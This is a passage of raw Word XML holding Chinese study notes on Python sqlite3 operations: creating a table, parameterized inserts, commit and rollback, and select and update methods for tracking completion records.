    <w:p w14:paraId="14C69939" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21F0D848" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="519" w:name="_Toc159779958"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="519"/>
    </w:p>
    <w:p w14:paraId="2FA5FAF4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def create_db(self, ):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D993058" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = """create table `record` (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E0614E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        `id` INTEGER PRIMARY KEY AUTOINCREMENT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6301D629" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    `l1` VARCHAR(60),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5881C127" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    `l2` text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DBE258" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    `compelete` smallint);"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0286F009" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> self.cur.execute(sql)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB3473D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    self.conn.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C0AAF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="476B4189" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="520" w:name="_Toc159779959"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>回滚</w:t>
      </w:r>
      <w:bookmarkEnd w:id="520"/>
    </w:p>
    <w:p w14:paraId="78BDF803" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def insert(self, l1=None, l2=None, compeleted=0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE083BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = "insert into record(`l1`, `l2`, `compelete`) values (?, ?, ?)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022A3B22" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql_values = (l1, l2, compeleted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292B428C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA4BB5E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>self.cur.execute(sql, sql_values)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B4F311" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.conn.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDDBF00" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    except Exception as err:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF5252A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插入错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> "+str(err))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9F7EA6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>self.conn.rollback()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACA573C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        return None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8163B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="521" w:name="_Toc159779960"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询数据</w:t>
      </w:r>
      <w:bookmarkEnd w:id="521"/>
    </w:p>
    <w:p w14:paraId="21DBA2A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01FA95B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果查不到数据，返回的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> [] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054D584F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果查到了数据，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fetchalll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接收，返回的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> [  (1,2,3), (xxx), (xxx)]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种形式的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03417A3D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01FB2EBA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def l1CompeleteSelect(self, ):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3C3F1D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = "select `l1` from `record` where `compelete`=1;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4DFF2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>res_cur = self.cur.execute(sql)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214371D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if res_cur != None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337363CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>res = res_cur.fetchall()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC8A4BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        res = [i[0] for i in res]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6864A466" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7803D0AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def l1Compelete(self, l1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45691460" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    sql = "select * from `record` where `l1`=?;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3F8236" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    res_cur = self.cur.execute(sql, (l1, )).fetchone()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E733B90" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if res_cur !=None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C0FD86" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        sql = "update `record` set `compelete`=? where `l1`=?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CABB0B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        values = (1, l1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37768C22" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EAC6FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            res_cur = self.cur.execute(sql, values)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE10BE4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            self.conn.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A91E8D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        except Exception as err:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9E7718" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            print("l1Compelete()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> "+str(err))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4B9846" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            self.conn.rollback()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1DBD59" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    elif res_cur ==None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF5EC5A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.insert(l1=l1, l2=None, compeleted=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B791D9F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7072504C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def l2CompeleteSelect(self, l1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7F7768" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = "select `l2` from `record` where `l1`=?;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7114BE19" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    values = (l1, )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CDC5E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    res_cur = self.cur.execute(sql, values)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482D523B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    res = res_cur.fetchone()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB88731" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if res!=None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B270989" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        return res[0].split(';')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A5C974" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def l2Update(self, l1, l2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2E2435" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    l2_list = self.l2CompeleteSelect(l1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472FE084" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    l2_list.append(l2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C50AF0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = "update `record` set `l2`=? where `l1`=?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C414AA4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    values = (';'.join(l2_list), l1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD94AEB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1C154E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        res_cur = self.cur.execute(sql, values)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066A1573" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.conn.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC59486" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    except Exception as err:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDFB7E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("l2Update()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> " + str(err))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9F60AD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.conn.rollback()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464CB094" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def l2Insert(self, l1, l2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071EEE8B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if self.l2CompeleteSelect(l1)==None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B1F6A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
